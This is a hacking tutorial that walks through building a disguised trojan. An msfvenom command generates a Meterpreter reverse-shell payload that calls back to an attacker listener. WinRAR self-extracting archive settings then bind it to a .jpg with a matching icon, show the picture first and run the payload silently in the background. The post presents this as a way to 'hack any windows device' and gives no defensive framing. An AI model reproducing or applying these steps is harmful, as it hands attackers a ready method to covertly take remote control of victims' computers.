Hack window 10 with an image
How to hack window 10 with an image
Today we will learn how to hack windows 10 with an image manually with Metasploit and WinRAR. I know from the name the hack might seem difficult but in reality, hacking windows with an image is very easy and straight forward. seeing how dangerous it is.
Anyone with a computer can do it. This hack is pretty easy to understand and can show how vulnerable windows os truly is. So without further ado, let’s start hacking windows.
This hack will be done in 3 parts:
Create a Metasploit Payload for hacking windows
Inject that Payload to an Image
Start your listener to intercept the remote connection
Requirements for this hack
Kali Linux OS
Windows System for merging the virus with an image
Image File with .jpg extension (Any image is fine)
Winrar installed on the windows system
1: Create a Metasploit payload:
Step 1: To make the Metasploit Payload
Open a Kali Linux terminal.
Step 2: Now type the following command to create a reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=4444 -f exe -o virus.exe
Use ifconfig in Linux to check your IP.
Step 3: Once you have created the virus, copy it to your windows machine. For Vmware direct copy-paste works just as well. Note this file is a remote access virus.
2. Bind Payload to an Image to make a Malicious image.
Step 1: On your Windows system copy the file to the desktop
Step 2: Download any image from the internet and save it on your desktop. We will call it Imagehack.jpg
Step 3: Now make a .ico (icon) file from the .jpg image. Use the website icoconvert for making the .ico file from the jpg file as shown.
Step 4: Collect all the three files virus.exe, imagehack.jpg & imagehack.ico in the same folder.
Step 5: Now select the file imagehack.jpg and virus.exe, right-click and select the option “Add to archive”. This option is added by WinRAR. You need WinRAR installed for this hack to work as intended.
Step 6: In the Archive option, You need to select the following settings:
Compression method to best
Create SFX archive
Archive format as rar
Step 7: Now, once the general settings are set. Click on the Advanced tab, click on SFX options and click OK.
Step 8: Now in the SFX options tab, click on the update tab and select the following settings
Extract and update
Overwrite all files
Step 9: Now select the setup tab and make sure you can see the following in the same order:
imagehack.jpg
virus.exe
The order is important because the first imagehack.jpg will open and then our Payload file, i.e. virus.exe, will be executed in the background.
Step 8: From the Text and Icon tab and select the icon file you created and load it to SFX icon from file set as shown
Step 9: Now navigate to modes tab and click on Hide all as shown in the image below:Step 10: Now click on OK and the malicious Image will be created. This malicious file can be used to hack any windows device with an image.